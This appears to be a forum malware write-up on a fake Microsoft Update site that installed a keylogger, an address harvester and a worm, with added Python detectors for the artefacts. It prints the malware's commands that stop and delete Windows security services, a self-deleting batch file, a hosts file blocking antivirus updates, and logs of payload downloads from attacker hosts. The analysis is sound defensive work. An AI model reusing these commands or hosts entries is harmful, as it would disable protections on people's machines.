Thanks to a tip-off from Suzi [ spywarewarrior ] and Adam [ Proactive Services ]

http://www.spywarewarrior.com/viewtopic.php?t=20016

The site has been shut down thanks to Suzi's help. Take a look at her video of the hijack installation.


QUOTE
Now you can get updates for Windows, Office and other Microsoft applications all in one place. Microsoft Update is a new service that brings you all the features and benefits of Windows Update plus downloads for other Microsoft applications including Office.

Final Step
To verify your Windows copy download and run setup programm, click,

hxxp ://68.178.170.123/wusetup.exe

Works with Automatic Updates:

Adds an easy link to your Start menu:

Microsoft Update Privacy Statement
©2006 Microsoft Corporation. All rights reserved. Terms of Use |Privacy Statement




------------

Files logged

----------

They tried to stop and delete the SP2 Security Center many times, but I don't have SP2.

QUOTE
net stop wscsvc
sc delete wscsvc
net1 stop shared access
sc delete shared access
net start mswinlogonprocservice
net1 start mswinlogonprocservice
sc delete mctskshd.exe


----------

1.wmf

hxxp ://68.178.170.123/1.wmf

----------

a.exe
a.bat

-----------

net.exe

net1.exe

--------------------

ieschedule.exe -> Internet Explorer Update Schedule
ieschedule.bat

--------------------

Keylogger:

ib7.dll - BHO

QUOTE
ib.CBrowserHelper
BHO
{1E6CE4CD-161B-4847-B8BF-E2EF72299D69}
C:\WINDOWS\System32\ib7.dll
Enabled
All Users

--------------------


harvest.exe -> outlook wabber
harvest.bat

--------------------

ieserver.exe -> Microsoft Windows HTTP Proxy Service Update

--------------------


smss.exe

C:\WINDOWS\smss.exe -> runs harvest.exe

----------

C:\WINDOWS\winlogon.exe - I-Worm-Netsky.d worm

http://www.f-secure.com/v-descs/netsky_d.shtml

--------------------

wusetup.exe
hosts.sam

----

All .bat files contain:

CODE
@echo off
:delfile
del %1
if exist %1 goto delfile
del %2
exit
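
The two command-line artefacts above (the `net stop` / `sc delete` run against the Security Center and firewall services, and the self-deleting batch file every dropper shipped with) are easy to triage mechanically. The following is an added example written for this page, not code from the original post: a small Python scanner that flags service-tampering command lines and recognises the "loop on `del %1` until the file is gone, then `del %2`" idiom. The command lines and batch text are constructed from what the post logged; the protected-service list and the assumption that %1 is the still-running caller and %2 a second file to remove are mine.

```python
import re

# Constructed sample input modelled on the command lines the post logged.
# The post's transcript shows "shared access" with a space; the real service
# name of the Windows Firewall/Internet Connection Sharing service is
# SharedAccess, which is what the sample uses.
SAMPLE_COMMANDS = [
    "net stop wscsvc",
    "sc delete wscsvc",
    "net1 stop sharedaccess",
    "sc delete sharedaccess",
    "net start mswinlogonprocservice",
    "sc delete mctskshd.exe",
    "net stop spooler",            # benign: not a protected service
]

# The self-deleting batch file from the post, reproduced as a test vector.
SAMPLE_BAT = """@echo off
:delfile
del %1
if exist %1 goto delfile
del %2
exit
"""

# Services whose removal blinds or disarms the host: Security Center,
# Windows Firewall/ICS and Automatic Updates (assumed list; extend as needed).
PROTECTED_SERVICES = {"wscsvc", "sharedaccess", "wuauserv"}

# Matches "net stop X", "net1 stop X", "sc stop X" and "sc delete X".
_SVC_CMD = re.compile(
    r"^\s*(?:net1?\s+stop|sc\s+(?:delete|stop))\s+(?P<svc>\S+)", re.IGNORECASE)


def find_service_tampering(lines):
    """Return (command, service) pairs that stop or delete a protected service."""
    hits = []
    for line in lines:
        m = _SVC_CMD.match(line)
        if m and m.group("svc").lower() in PROTECTED_SERVICES:
            hits.append((line.strip(), m.group("svc").lower()))
    return hits


def is_self_deleting_batch(text):
    """Detect the dropper's clean-up idiom: spin on 'del %1' until the file is
    gone (a running executable cannot be deleted until it exits), then
    'del %2' for a second file, typically the batch file's own path."""
    lines = [l.strip().lower() for l in text.splitlines() if l.strip()]
    labels = {l[1:] for l in lines if l.startswith(":")}
    has_del_arg = any(re.fullmatch(r"del\s+%1", l) for l in lines)
    deletes_self = any(re.fullmatch(r"del\s+%2", l) for l in lines)
    loops_on_arg = False
    for l in lines:
        m = re.fullmatch(r"if\s+exist\s+%1\s+goto\s+(\S+)", l)
        if m and m.group(1) in labels:   # the goto must target a real label
            loops_on_arg = True
    return has_del_arg and loops_on_arg and deletes_self


if __name__ == "__main__":
    for cmd, svc in find_service_tampering(SAMPLE_COMMANDS):
        print(f"service tampering: {cmd!r} targets {svc}")
    print("self-deleting batch:", is_self_deleting_batch(SAMPLE_BAT))
```

Run it against a process-creation log or a directory of dropped .bat files; the `sc delete mctskshd.exe` line is deliberately not flagged, since deleting an unknown service is not by itself evidence of disarming the host.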


----------------------------------


Internet Log:

QUOTE
hxxp ://68.178.170.123/1.wmf
hxxp ://68.178.170.123/opt-in1.jpg
hxxp ://68.178.170.123/opt-in2.gif
hxxp ://68.178.170.123/welcome.jpg
hxxp ://68.178.170.123/button2.jpg
hxxp ://68.178.170.123/opt-in1.jpg
hxxp ://68.178.170.123/opt-in2.gif

MyIE Web Browser hxxp://hit15.hotlog.ru/cgi-bin/hotlog/count?0.8161752715420998&s=340055&im=1&r=&pg=hxxp%3A//68.178.170.123/&c=Y&j=Y&wh=1024x768&px=32&js=1.3&

MyIE Web Browser GET hxxp ://hit15.hotlog.ru/cgi-bin/hotlog/count?0.8161752715420998&s=340055&im=1&r=&pg=hxxp %3A//68.178.170.123/&c=Y&j=Y&wh=1024x768&px=32&js=1.3&

MyIE Web Browser hxxp ://68.178.170.123/favicon.ico
MyIE Web Browser GET hxxp ://68.178.170.123/favicon.ico

MyIE Web Browser hxxp ://hit5.hotlog.ru/cgi-bin/hotlog/img?im=1&v=211,23077,169,4704,184,5561

MyIE Web Browser hxxp ://68.178.170.123/wusetup.exe
MyIE Web Browser hxxp ://68.178.170.123/button4.jpg

MyIE Web Browser hxxp ://hit15.hotlog.ru/cgi-bin/hotlog/count?0.8161752715420998&s=340055&im=1&r=&pg=hxxp%3A//68.178.170.123/&c=Y&j=Y&wh=1024x768&px=32&js=1.3&

MyIE Web Browser GET hxxp ://68.178.170.123/button3.jpg
MyIE Web Browser GET hxxp ://68.178.170.123/button4.jpg

MyIE Web Browser GET hxxp ://hit15.hotlog.ru/cgi-bin/hotlog/count?0.8161752715420998&s=340055&im=1&r=&pg=hxxp %3A//68.178.170.123/&c=Y&j=Y&wh=1024x768&px=32&js=1.3&

MyIE Web Browser hxxp://68.178.170.123/button3.jpg

hxxp ://hit5.hotlog.ru/cgi-bin/hotlog/img?im=1&v=212,23078,169,4704,184,5561

hxxp ://dxtserver1.net/source/bin/ieschedule.exe

Internet Explorer Update Schedule = hxxp ://dxtserver1.net/source/bin//count.php?simple=1&user=SPYWAREHUNTER-18821&country=united%20states&iso=us&region=tx&city=plano

Session Manager Subsystem GET hxxp ://wnplake.net/admin/v12.html?us

Session Manager Subsystem = hxxp ://dxtserver1.net/source/bin/strana/!all//harvest.exe

Session Manager Subsystem GET hxxp ://dxtserver1.net/source/bin/strana/!all//ieserver.exe

Session Manager Subsystem hxxp ://dxtserver1.net/source/bin/strana/!all//ieserver.exe

11/2/2003 6:19:58 PM Internet Explorer Update Schedule GET hxxp ://dxtserver1.net/source/bin//ib7.dll

11/2/2003 6:20:24 PM Internet Explorer Update Schedule http ://dxtserver1.net/source/bin//smss.exe

11/2/2003 6:21:51 PM Internet Explorer Update Schedule http ://dxtserver1.net/source/bin//count.php?user=SPYWAREHUNTER-18821 localhost URL

11/2/2003 6:22:08 PM Internet Explorer Update Schedule hxxp ://detectlocation.ru/cgi-bin/js.pl?66.139.76.17


That's really weird with the time entries in the last part of the logs showing up as from 2003... but hey, all they get is my proxy IP.
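
The log above mixes a few line shapes (bare URL, "process GET URL", "process = URL", timestamped lines) and defangs the scheme as "hxxp ://". As an added example that is not part of the original post, here is a Python parser that normalises those lines, groups contacted hosts by the process description, pulls out the executable downloads, and isolates requests made under the description string "Session Manager Subsystem". The genuine Session Manager (smss.exe) lives in System32 and never makes HTTP requests, so that description appearing in a web log is the impostor C:\WINDOWS\smss.exe the post lists. The log excerpt is constructed from the post's lines; the file extensions treated as payloads are my choice.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed excerpt of the post's "Internet Log", kept in its defanged form.
SAMPLE_LOG = """\
hxxp ://68.178.170.123/1.wmf
MyIE Web Browser GET hxxp ://68.178.170.123/favicon.ico
MyIE Web Browser hxxp ://68.178.170.123/wusetup.exe
hxxp ://dxtserver1.net/source/bin/ieschedule.exe
Internet Explorer Update Schedule = hxxp ://dxtserver1.net/source/bin//count.php?simple=1&user=SPYWAREHUNTER-18821
Session Manager Subsystem GET hxxp ://wnplake.net/admin/v12.html?us
Session Manager Subsystem = hxxp ://dxtserver1.net/source/bin/strana/!all//harvest.exe
11/2/2003 6:19:58 PM Internet Explorer Update Schedule GET hxxp ://dxtserver1.net/source/bin//ib7.dll
11/2/2003 6:20:24 PM Internet Explorer Update Schedule http ://dxtserver1.net/source/bin//smss.exe
11/2/2003 6:22:08 PM Internet Explorer Update Schedule hxxp ://detectlocation.ru/cgi-bin/js.pl?66.139.76.17
"""

# Optional timestamp, a free-text process description, an optional GET/=,
# then a URL whose scheme may be defanged ("hxxp ://").
_LINE = re.compile(
    r"^(?:(?P<ts>\d{1,2}/\d{1,2}/\d{4}\s+\d{1,2}:\d{2}:\d{2}\s+[AP]M)\s+)?"
    r"(?P<proc>.*?)\s*(?:GET|=)?\s*"
    r"(?P<url>h(?:xx|tt)p\s*://\S+)",
    re.IGNORECASE)

PAYLOAD_EXT = (".exe", ".dll", ".bat")   # assumed set of "code" downloads

# Description string of the genuine Session Manager (smss.exe), which lives in
# System32 and never speaks HTTP; the post's copy was C:\WINDOWS\smss.exe.
FAKE_SYSTEM_PROCESS = "session manager subsystem"


def refang(url):
    """Turn 'hxxp ://host/x' back into 'http://host/x' so urlsplit can parse it."""
    return re.sub(r"^h(?:xx|tt)p\s*://", "http://", url, flags=re.IGNORECASE)


def parse_log(text):
    """Return one {'ts', 'proc', 'host', 'path', 'url'} dict per parseable line."""
    records = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        url = refang(m.group("url"))
        parts = urlsplit(url)
        records.append({
            "ts": m.group("ts"),
            "proc": m.group("proc").strip(),
            "host": (parts.hostname or "").lower(),
            "path": parts.path,
            "url": url,
        })
    return records


def hosts_by_process(records):
    """Map each process description to the sorted set of hosts it contacted."""
    out = defaultdict(set)
    for r in records:
        out[r["proc"]].add(r["host"])
    return {proc: sorted(hosts) for proc, hosts in out.items()}


def payload_fetches(records):
    """(process, url) pairs for downloads of executable content."""
    return [(r["proc"], r["url"]) for r in records
            if r["path"].lower().endswith(PAYLOAD_EXT)]


def fake_system_process_requests(records):
    """URLs requested under the genuine Session Manager's description string."""
    return [r["url"] for r in records if r["proc"].lower() == FAKE_SYSTEM_PROCESS]


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for proc, hosts in hosts_by_process(recs).items():
        print(f"{proc or '<no process>'}: {', '.join(hosts)}")
    for proc, url in payload_fetches(recs):
        print(f"payload: {proc or '<no process>'} -> {url}")
    print("smss.exe impostor requests:", fake_system_process_requests(recs))
```

The process column in a log like this is the executable's version-resource description, not its path, which is exactly why the dropper named its files smss.exe and winlogon.exe and gave ieschedule.exe an "Internet Explorer Update Schedule" string; always resolve the description back to a full path before trusting it.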


--------------------------------------


68.178.170.123 = ip-68-178-170-123.ip.secureserver.net.


wnplake.net - 81.177.28.14


CODE
61 domains found on 81.177.28.14

.www.Wnplake.net
.www.Abpgroup.info
.www.Ak-chemicals.com
.www.Alfa-park-centre.com
.www.Amwayst.net
.www.Annaivanova.com
.www.Apmatypa.com
.www.Ateks.net
.www.Avtohart.com
.www.Bestchinesemanufacturers.com
.www.Bitum.org
.www.Capitanflint.com
.www.Chemdel.net
.www.Chpg-tyre.com
.www.Da2info.com
.www.Dating-s.net
.www.Dressirovka.com
.www.Erafound.org
.www.Fregat.info
.www.Hddprotector.com
.www.Ibm52005.info
.www.Iic-ru.com
.www.Jaguar-invest.com
.www.Juriksoft.net
.www.Klassiki.com
.www.Korsun.org
.www.Kreditka.info
.www.Kucha-safe.net
.www.Kvl-tour.net
.www.Lightoze.net
.www.Luxstyling.com
.www.Mega-stroi.com
.www.Mmg-rus.com
.www.Mosrealt.info
.www.Mtuci.org
.www.Nashi-spb.org
.www.Novoros.info
.www.Otherplanetsphinx.com
.www.Proffy.info
.www.Ra21.com
.www.Ratan.org
.www.Rmmonline.com
.www.Rukav.net
.www.Russcollector.com
.www.Rzzp.com
.www.Schelkovo.net
.www.Secur-exchange.com
.www.Shesayyes.com
.www.Souz-m.com
.www.Souzpromplast.com
.www.Strahovaya.com
.www.Suchki.org
.www.Supershina.com
.www.Turique.com
.www.Udaff.biz
.www.Vavilova.org
.www.Vishivki.net
.www.You-it-can.com
.www.Znaki.net
.www.Otherplanetsphynx.com
.www.Desktopa.net



Outbound FTP connection to dxtserver.net - 81.177.28.3


QUOTE
Web server hosts 77 websites
Reverse DNS:  cp40.agava.net
-
inetnum:        81.177.28.0 - 81.177.29.255
netname:        AGAVA
descr:          AGAVA Software Ltd Network
country:        RU
admin-c:        VVP44-RIPE
tech-c:         IA327-RIPE
tech-c:         AK305-RIPE
status:         ASSIGNED PA
mnt-by:         AS8342-MNT
source:         RIPE # Filtered


CODE
77 domains found on 81.177.28.3

.www.21bek.org
.www.Akvarelcafe.com
.www.Alfastroy.com
.www.Anisimovka.com
.www.Ara-industry.com
.www.Artatv.com
.www.Bardy2.net
.www.Barier-cs.com
.www.Bisershop.com
.www.Crazylol.com
.www.Detectlocation.info
.www.Devo4ek.net
.www.Dkukz.com
.www.Dudikato.com
.www.Dxtadm.net
.www.Dxtserver.net
.www.Dxtserver1.net
.www.Dxtserver2.net
.www.Eliatex-bel.com
.www.Elite-eskort.com
.www.Evro-stroy.com
.www.Eye-sos.com
.www.Faberon.net
.www.Faleristmarket.com
.www.Fundofgrowth.org
.www.Gta-limited.com
.www.Info-market.org
.www.Infocentr.info
.www.Inmast.com
.www.Jelezzo.com
.www.Klevo.net
.www.Kupils.net
.www.Kuzoff.com
.www.Lolimages.com
.www.Marspipe.com
.www.Mhprj.com
.www.Neotelinfo.net
.www.Npocmumymku.com
.www.Otvalentina.com
.www.Otzhig.com
.www.Pel-online.com
.www.Pidan.info
.www.Plazalog.com
.www.Problemnet.net
.www.Proficentre.com
.www.Rapsody.biz
.www.Ravenscourtgalleries.com
.www.Realstoriesstory.com
.www.Riveiro.info
.www.Rus-souvenir.com
.www.Rusfest.com
.www.Russia-spb.com
.www.Russian-internet-business.com
.www.Salesoft.biz
.www.Serosti.net
.www.Seven-super.com
.www.Sfinks-group.com
.www.Sic-nt.com
.www.Sk-si.com
.www.Startcopy.info
.www.Streletz.com
.www.Styxclub.com
.www.Teplocom.net
.www.Timurlansky.com
.www.Top10-search.com
.www.Tuktarov.com
.www.Tuvaetno.com
.www.Uamafia.com
.www.Udareniye.com
.www.Uzbegimblog.com
.www.Vachdom.com
.www.Varlamov.net
.www.Volgabereg.com
.www.Worldofcs.com
.www.Zdorov.org
.www.Zed-tech.biz
.www.Alfa-park.com




Hosts.sam -> C:\WINDOWS\hosts.sam



QUOTE
10.0.0.1 avp.com
10.0.0.1 kaspersky.com
10.0.0.1 kaspersky-labs.com
10.0.0.1 updates1.kaspersky.com
10.0.0.1 updates2.kaspersky.com
10.0.0.1 updates3.kaspersky.com
10.0.0.1 updates-us1.kaspersky.com
10.0.0.1 downloads1.kaspersky.com
10.0.0.1 downloads-us1.kaspersky.com
10.0.0.1 www.avp.com
10.0.0.1 www.kaspersky.com
10.0.0.1 d-ru-1f.kaspersky-labs.com
10.0.0.1 d-ru-1h.kaspersky-labs.com
10.0.0.1 d-ru-2f.kaspersky-labs.com
10.0.0.1 d-ru-2h.kaspersky-labs.com
10.0.0.1 d-eu-2f.kaspersky-labs.com
10.0.0.1 d-eu-2h.kaspersky-labs.com
10.0.0.1 d-eu-1f.kaspersky-labs.com
10.0.0.1 d-eu-1h.kaspersky-labs.com
10.0.0.1 d-us-1f.kaspersky-labs.com
10.0.0.1 d-us-1h.kaspersky-labs.com
10.0.0.1 downloads1.kaspersky.ru
10.0.0.1 downloads2.kaspersky.ru
10.0.0.1 downloads3.kaspersky.ru
10.0.0.1 downloads4.kaspersky.ru
10.0.0.1 downloads5.kaspersky.ru
10.0.0.1 eset.com
10.0.0.1 www.eset.com
10.0.0.1 u2.eset.com
10.0.0.1 u3.eset.com
10.0.0.1 u4.eset.com
10.0.0.1 u7.eset.com
10.0.0.1 82.165.250.33
10.0.0.1 82.165.237.14
10.0.0.1 customer.symantec.com
10.0.0.1 liveupdate.symantec.com
10.0.0.1 liveupdate.symantecliveupdate.com
10.0.0.1 securityresponse.symantec.com
10.0.0.1 symantec.com
10.0.0.1 update.symantec.com
10.0.0.1 updates.symantec.com
10.0.0.1 www.symantec.com
10.0.0.1 mast.mcafee.com
10.0.0.1 mcafee.com
10.0.0.1 rads.mcafee.com
10.0.0.1 www.mcafee.com
10.0.0.1 us.mcafee.com
10.0.0.1 dispatch.mcafee.com
10.0.0.1 download.mcafee.com
10.0.0.1 metalhead2005.info
10.0.0.1 my-etrust.com
10.0.0.1 nai.com
10.0.0.1 networkassociates.com
10.0.0.1 secure.nai.com
10.0.0.1 sophos.com
10.0.0.1 trendmicro.com
10.0.0.1 viruslist.com
10.0.0.1 viruslist.com
10.0.0.1 www.ca.com
10.0.0.1 www.f-secure.com
10.0.0.1 www.microsoft.com
10.0.0.1 www.my-etrust.com
10.0.0.1 www.nai.com
10.0.0.1 www.networkassociates.com
10.0.0.1 www.sophos.com
10.0.0.1 www.trendmicro.com
10.0.0.1 www.viruslist.com
10.0.0.1 ca.com
10.0.0.1 d66.myleftnut.info
10.0.0.1 f-secure.com
10.0.0.1 irc.blackcarder.net
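
The dropped hosts file above is the classic "blackhole the AV vendors" trick: every update and download host for Kaspersky, ESET, Symantec, McAfee, Sophos, Trend Micro, CA, F-Secure and microsoft.com is pinned to 10.0.0.1, so signature updates silently fail. On Windows the file that actually takes effect is %SystemRoot%\System32\drivers\etc\hosts; the post found this copy as C:\WINDOWS\hosts.sam. As an added example that is not part of the original post, here is a Python checker for that pattern. It parses a hosts file and flags entries that name a security-vendor zone, use an IP literal as the "hostname", or belong to a large group of names all pointing at one non-loopback address. The sample file is constructed from the post's entries plus two benign lines; the vendor-zone list and the group-size threshold are my assumptions.

```python
import ipaddress
from collections import Counter

# Constructed excerpt of the dropped hosts.sam from the post, plus two ordinary
# lines (localhost and an internal name) so the scanner has something to pass.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
192.168.1.10    fileserver.corp.example   # constructed benign entry
10.0.0.1 avp.com
10.0.0.1 kaspersky.com
10.0.0.1 liveupdate.symantec.com
10.0.0.1 update.symantec.com
10.0.0.1 download.mcafee.com
10.0.0.1 www.microsoft.com
10.0.0.1 82.165.250.33
10.0.0.1 irc.blackcarder.net
"""

# Vendor zones whose presence in a hosts file is almost always tampering:
# nobody legitimately pins AV update servers to a fixed address (assumed list).
SECURITY_ZONES = (
    "kaspersky.com", "kaspersky-labs.com", "kaspersky.ru", "avp.com",
    "eset.com", "symantec.com", "symantecliveupdate.com", "mcafee.com",
    "nai.com", "networkassociates.com", "sophos.com", "trendmicro.com",
    "f-secure.com", "ca.com", "my-etrust.com", "viruslist.com", "microsoft.com",
)

# How many names must share one non-loopback target before we call it a
# sinkhole; an assumed threshold, tune for your environment.
SINKHOLE_GROUP = 5


def parse_hosts(text):
    """Return (ip, name) pairs from a hosts file, dropping comments and blanks."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        ip, names = parts[0], parts[1:]
        for name in names:          # one line may carry several aliases
            entries.append((ip, name.lower()))
    return entries


def in_security_zone(name):
    """True if name is a vendor zone or a host inside one (suffix match on a label boundary)."""
    return any(name == z or name.endswith("." + z) for z in SECURITY_ZONES)


def find_hijacks(text):
    """Return (ip, name, reasons) for entries that look like hosts-file hijacking."""
    entries = parse_hosts(text)
    targets = Counter(ip for ip, _ in entries)
    findings = []
    for ip, name in entries:
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue                # malformed line, not our concern here
        reasons = []
        if in_security_zone(name):
            reasons.append("security-vendor name")
        # An IP literal on the name side is never resolved through hosts by
        # normal DNS clients; it exists to trip update clients that connect by
        # address, and it is a sure sign the file was machine-generated.
        try:
            ipaddress.ip_address(name)
            reasons.append("IP literal as hostname")
        except ValueError:
            pass
        if not addr.is_loopback and targets[ip] >= SINKHOLE_GROUP:
            reasons.append(f"{targets[ip]} names share non-loopback target {ip}")
        if reasons:
            findings.append((ip, name, reasons))
    return findings


if __name__ == "__main__":
    for ip, name, reasons in find_hijacks(SAMPLE_HOSTS):
        print(f"{ip:<12} {name:<32} {'; '.join(reasons)}")
```

Point it at the live hosts file on the suspect machine rather than at the dropped copy; a clean file should produce no findings, and a single large group of vendor names mapped to one address is enough on its own to justify restoring the default file and re-running updates.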




------------------------------------------------------------------------------

Uploader-AB is a set of files with the following names:

"harvest.exe"

They are built using Visual Basic. Upon execution, "harvest.exe", which goes by the name "outlook wabber", harvests email addresses and visited URLs as well as internet search keywords and logs them into a file, "pstore.txt".

This file is created inside a folder named "drv32dta", which is present in %Sysdir%.

(Where %Sysdir% is the Windows System directory, for example C:\WINDOWS\SYSTEM32)

Some of these files create batch files to delete the temporary files that they create. During analysis it was observed that the logged file "pstore.txt" was not uploaded to any site.

==========================


Spyware Doctor scan detected:

windows\system32\drv32dta
windows\system32\drv32dta\pstore.txt


Positive identifications:
http://vil.nai.com/vil/content/v_138123.htm
http://products.antivir.de/en/threats/BDS_..._C_details.html
http://avira.com/en/threats/section/fullde...dor.et.3.c.html


QUOTE
– [HKCR\TypeLib\{14A5F3E7-B235-4D98-9264-5C67D2657BC4}\2.0\0\win32]
   • @="%malware execution directory%\ib6.dll"


Aliases:
• Mcafee: Keylog-Sters
• Kaspersky: Trojan-Spy.Win32.Bancos.nw
• TrendMicro: TSPY_BANCOS.BRV
• F-Secure: W32/Banker.GZW
• Sophos: Troj/Bancos-BRV


It's not visible in Windows Explorer, but it is in a DOS box, using

dir c:\WINDOWS\system32

Use the following command line to unhide the folder and access the keylogger's text-file log:

attrib -s C:\WINDOWS\system32\drv32dta


--------------------------------------------------------------------------



